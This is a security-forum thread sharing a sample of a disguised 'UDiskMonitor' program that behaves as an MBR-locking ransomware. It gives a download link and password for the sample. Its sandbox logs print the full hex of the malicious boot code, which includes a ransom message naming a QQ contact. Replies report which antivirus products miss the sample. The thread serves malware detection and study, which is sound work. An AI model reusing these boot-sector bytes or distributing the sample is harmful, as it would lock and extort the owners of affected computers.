今年7月份中的毒，发现360还不报毒。。。

显示全部楼层 · 发表于 2017-9-7 09:45:44

样本已上传网盘。链接：http://pan.baidu.com/s/1c11dCxq 密码：7k89
然而现在绿软上面还有，还能下载。
里面有破解密码，看看能解出来不。

在实机上检测，两台笔记本，同样使用File_Analysis@学雷锋做人（好用！）检测，一个能检测出，一个检测不出。据说这货还能检测是不是在虚拟机运行。。。。

这是检测出的
[mw_shl_code=css,true]08:54:26[1]：(允许)程序启动：File_Analysis 行为记录成功开启规则版本：1.7.0.0

08:54:26[2]：(允许)获取文件属性：C:\UDiskMonitor

08:54:28[3]：(阻止)创建注册表键：HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\SOFTWARE\UDiskMonitor

08:54:28[4]：(允许)时间操作：设置定时器(一)    时间间隔：10ms

08:54:40[6]：(阻止)创建注册表键：HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\SOFTWARE\UDiskMonitor

08:54:40[7]：(允许)读取文件：\\.\\physicaldrive0    访问权限：-2147483648

08:54:40[8]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

08:54:40[9]：(阻止)写入MBR Hex： 33 C0 8E D0 BC 00 7C 8E C0 8E D8 BE 00 7C BF 00 06 B9 00 02 FC F3 A4 50 68 1C 06 CB FB B9 04 00 BD BE 07 80 7E 00 00 7C 0B 0F 85 0E 01 83 C5 10 E2 F1 CD 18 88 56 00 55 C6 46 11 05 C6 46 10 00 B4 41 BB AA 55 CD 13 5D 72 0F 81 FB 55 AA 75 09 F7 C1 01 00 74 03 FE 46 10 66 60 80 7E 10 00 74 26 66 68 00 00 00 00 66 FF 76 08 68 00 00 68 00 7C 68 01 00 68 10 00 B4 42 8A 56 00 8B F4 CD 13 9F 83 C4 10 9E EB 14 B8 01 02 BB 00 7C 8A 56 00 8A 76 01 8A 4E 02 8A 6E 03 CD 13 66 61 73 1C FE 4E 11 75 0C 80 7E 00 80 0F 84 8A 00 B2 80 EB 84 55 32 E4 8A 56 00 CD 13 5D EB 9E 81 3E FE 7D 55 AA 75 6E FF 76 00 E8 8D 00 75 17 FA B0 D1 E6 64 E8 83 00 B0 DF E6 60 E8 7C 00 B0 FF E6 64 E8 75 00 FB B8 00 BB CD 1A 66 23 C0 75 3B 66 81 FB 54 43 50 41 75 32 81 F9 02 01 72 2C 66 68 07 BB 00 00 66 68 00 02 00 00 66 68 08 00 00 00 66 53 66 53 66 55 66 68 00 00 00 00 66 68 00 7C 00 00 66 61 68 00 00 07 CD 1A 5A 32 F6 EA 00 7C 00 00 CD 18 A0 B7 07 EB 08 A0 B6 07 EB 03 A0 B5 07 32 E4 05 00 07 8B F0 AC 3C 00 74 09 BB 07 00 B4 0E CD 10 EB F2 F4 EB FD 2B C9 E4 64 EB 00 24 02 E0 F8 24 02 C3 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 63 7B 9A 23 E0 D3 95 00 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

08:54:40[10]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

08:54:40[11]：(阻止)写入MBR Hex： 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD 00 7D B9 90 00 B8 01 13 BB 0C 00 B2 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31 C0 CD 16 3C 08 74 1B 3C 0D 74 26 B4 02 88 07 88 67 01 30 C0 88 47 02 83 C3 02 41 2E 89 0E FF 7C EB DD 83 EB 02 49 2E 89 0E FF 7C 31 C0 89 07 EB CE 8C C8 8E C0 31 DB 3E 8A 07 3C 57 75 73 83 C3 02 3E 8A 07 3C 57 75 69 83 C3 02 3E 8A 07 3C 65 75 5F 83 C3 02 B1 FF B5 00 2E 88 2E FE 7C 3E 8A 07 3C 00 74 0A 2E 30 06 FE 7C 83 C3 02 E2 EF B8 00 7E 8E C0 31 DB B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 BB BD 01 30 ED 26 88 2F BB BE 01 B1 40 26 8A 07 2E 32 06 FE 7C 26 88 07 43 E2 F2 31 DB B4 03 B2 80 B0 01 B6 00 B5 00 B1 01 CD 13 EB 1C BB 00 B8 81 C3 90 00 B0 58 88 07 2E 8B 0E FF 7C 31 C0 89 07 83 C3 02 E2 F9 E9 0B FF B8 FF FF 50 B8 00 00 50 CB 00 00 59 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 69 73 20 6C 6F 63 6B 65 64 2C 20 70 6C 65 61 73 65 20 63 6F 6E 74 61 63 74 20 51 51 3A 32 31 30 31 31 37 38 30 32 30 20 20 66 6F 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64 2C 20 70 6C 65 61 73 65 20 64 6F 20 6E 6F 74 20 74 72 79 2C 20 6F 72 20 79 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 66 69 6C 65 73 20 77 69 6C 6C 20 61 6C 77 61 79 73 20 62 65 20 64 65 6C 65 74 65 64 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

模糊分析MBR逻辑锁密码范围：:2101178020fortheunlockpassword,pleasedonottry,oryourcomputerfileswillalwaysbedeleted    Hex：3A 32 31 30 31 31 37 38 30 32 30 66 6F 72 74 68 65 75 6E 6C 6F 63 6B 70 61 73 73 77 6F 72 64 2C 70 6C 65 61 73 65 64 6F 6E 6F 74 74 72 79 2C 6F 72 79 6F 75 72 63 6F 6D 70 75 74 65 72 66 69 6C 65 73 77 69 6C 6C 61 6C 77 61 79 73 62 65 64 65 6C 65 74 65 64

08:54:40[12]：(允许)读取文件：\\.\\physicaldrive0    访问权限：-2147483648

08:54:40[13]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

08:54:40[14]：(阻止)写入MBR Hex： 33 C0 8E D0 BC 00 7C 8E C0 8E D8 BE 00 7C BF 00 06 B9 00 02 FC F3 A4 50 68 1C 06 CB FB B9 04 00 BD BE 07 80 7E 00 00 7C 0B 0F 85 0E 01 83 C5 10 E2 F1 CD 18 88 56 00 55 C6 46 11 05 C6 46 10 00 B4 41 BB AA 55 CD 13 5D 72 0F 81 FB 55 AA 75 09 F7 C1 01 00 74 03 FE 46 10 66 60 80 7E 10 00 74 26 66 68 00 00 00 00 66 FF 76 08 68 00 00 68 00 7C 68 01 00 68 10 00 B4 42 8A 56 00 8B F4 CD 13 9F 83 C4 10 9E EB 14 B8 01 02 BB 00 7C 8A 56 00 8A 76 01 8A 4E 02 8A 6E 03 CD 13 66 61 73 1C FE 4E 11 75 0C 80 7E 00 80 0F 84 8A 00 B2 80 EB 84 55 32 E4 8A 56 00 CD 13 5D EB 9E 81 3E FE 7D 55 AA 75 6E FF 76 00 E8 8D 00 75 17 FA B0 D1 E6 64 E8 83 00 B0 DF E6 60 E8 7C 00 B0 FF E6 64 E8 75 00 FB B8 00 BB CD 1A 66 23 C0 75 3B 66 81 FB 54 43 50 41 75 32 81 F9 02 01 72 2C 66 68 07 BB 00 00 66 68 00 02 00 00 66 68 08 00 00 00 66 53 66 53 66 55 66 68 00 00 00 00 66 68 00 7C 00 00 66 61 68 00 00 07 CD 1A 5A 32 F6 EA 00 7C 00 00 CD 18 A0 B7 07 EB 08 A0 B6 07 EB 03 A0 B5 07 32 E4 05 00 07 8B F0 AC 3C 00 74 09 BB 07 00 B4 0E CD 10 EB F2 F4 EB FD 2B C9 E4 64 EB 00 24 02 E0 F8 24 02 C3 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D 00 00 00 63 7B 9A 23 E0 D3 95 00 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

08:54:40[15]：(阻止)修改内核对象：\\.\\physicaldrive0(物理磁盘)

08:54:40[16]：(阻止)写入MBR Hex： 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD 00 7D B9 90 00 B8 01 13 BB 0C 00 B2 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31 C0 CD 16 3C 08 74 1B 3C 0D 74 26 B4 02 88 07 88 67 01 30 C0 88 47 02 83 C3 02 41 2E 89 0E FF 7C EB DD 83 EB 02 49 2E 89 0E FF 7C 31 C0 89 07 EB CE 8C C8 8E C0 31 DB 3E 8A 07 3C 57 75 73 83 C3 02 3E 8A 07 3C 57 75 69 83 C3 02 3E 8A 07 3C 65 75 5F 83 C3 02 B1 FF B5 00 2E 88 2E FE 7C 3E 8A 07 3C 00 74 0A 2E 30 06 FE 7C 83 C3 02 E2 EF B8 00 7E 8E C0 31 DB B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 BB BD 01 30 ED 26 88 2F BB BE 01 B1 40 26 8A 07 2E 32 06 FE 7C 26 88 07 43 E2 F2 31 DB B4 03 B2 80 B0 01 B6 00 B5 00 B1 01 CD 13 EB 1C BB 00 B8 81 C3 90 00 B0 58 88 07 2E 8B 0E FF 7C 31 C0 89 07 83 C3 02 E2 F9 E9 0B FF B8 FF FF 50 B8 00 00 50 CB 00 00 59 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 69 73 20 6C 6F 63 6B 65 64 2C 20 70 6C 65 61 73 65 20 63 6F 6E 74 61 63 74 20 51 51 3A 32 31 30 31 31 37 38 30 32 30 20 20 66 6F 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73 73 77 6F 72 64 2C 20 70 6C 65 61 73 65 20 64 6F 20 6E 6F 74 20 74 72 79 2C 20 6F 72 20 79 6F 75 72 20 63 6F 6D 70 75 74 65 72 20 66 69 6C 65 73 20 77 69 6C 6C 20 61 6C 77 61 79 73 20 62 65 20 64 65 6C 65 74 65 64 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 16 D4 74 75 54 53 AA AB AB 54 5C 54 54 54 5C 54 4D 54 AA AB AB 5B AA AB AB 54 44 54 4D 54 0C 24 0F 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 55 AA

模糊分析MBR逻辑锁密码范围：:2101178020fortheunlockpassword,pleasedonottry,oryourcomputerfileswillalwaysbedeleted    Hex：3A 32 31 30 31 31 37 38 30 32 30 66 6F 72 74 68 65 75 6E 6C 6F 63 6B 70 61 73 73 77 6F 72 64 2C 70 6C 65 61 73 65 64 6F 6E 6F 74 74 72 79 2C 6F 72 79 6F 75 72 63 6F 6D 70 75 74 65 72 66 69 6C 65 73 77 69 6C 6C 61 6C 77 61 79 73 62 65 64 65 6C 65 74 65 64

08:54:40[17]：(允许)程序退出：File_Analysis 行为记录到此为止

[/mw_shl_code]
这是未检测出的
[mw_shl_code=css,true]09:34:49[1]：(允许)程序启动：File_Analysis 行为记录成功开启规则版本：1.7.0.0

09:34:49[2]：(允许)获取文件属性：C:\UDiskMonitor

09:34:51[3]：(允许)获取文件属性：D:\UB

09:34:51[4]：(允许)时间操作：设置定时器(一)    时间间隔：10ms

09:34:54[6]：(阻止)写注册表值：HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\DestDir    数据：D:\UB

09:34:54[7]：(阻止)写注册表值：HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\AutoHide    数据：

09:34:54[8]：(阻止)写注册表值：HKEY_LOCAL_MACHINE\SOFTWARE\UDiskMonitor\AutoRun    数据：

09:34:54[9]：(允许)读取文件：\\.\\physicaldrive0    访问权限：-2147483648

09:34:54[10]：(允许)程序退出：File_Analysis 行为记录到此为止
[/mw_shl_code]

显示全部楼层 · 发表于 2017-9-7 09:49:33

管家扫描miss

显示全部楼层 · 发表于 2017-9-7 09:53:50

哈勃未报毒。

显示全部楼层 · 发表于 2017-9-7 09:55:44

卡巴未报毒

显示全部楼层 · 发表于 2017-9-7 10:01:30

猎豹杀，忽略后
过avast扫描和双击

显示全部楼层 · 发表于 2017-9-7 10:04:06

本帖最后由 Gollum 于 2017-9-7 10:11 编辑

BDTS、KIS、NS扫描放过

显示全部楼层 · 发表于 2017-9-7 10:14:23

ESET miss

显示全部楼层 · 发表于 2017-9-7 10:15:05

双击过诺顿，暂时没有后续动作！

显示全部楼层 · 发表于 2017-9-7 10:16:18

胖福发表于 2017-9-7 10:15
双击过诺顿，暂时没有后续动作！

点击退出试试，退出会执行mbr病毒模块。

显示全部楼层 · 发表于 2017-9-7 10:17:17

点击退出会将mbr病毒写入硬盘引导区。

[病毒样本] 今年7月份中的毒，发现360还不报毒。。。

本帖子中包含更多资源

本帖子中包含更多资源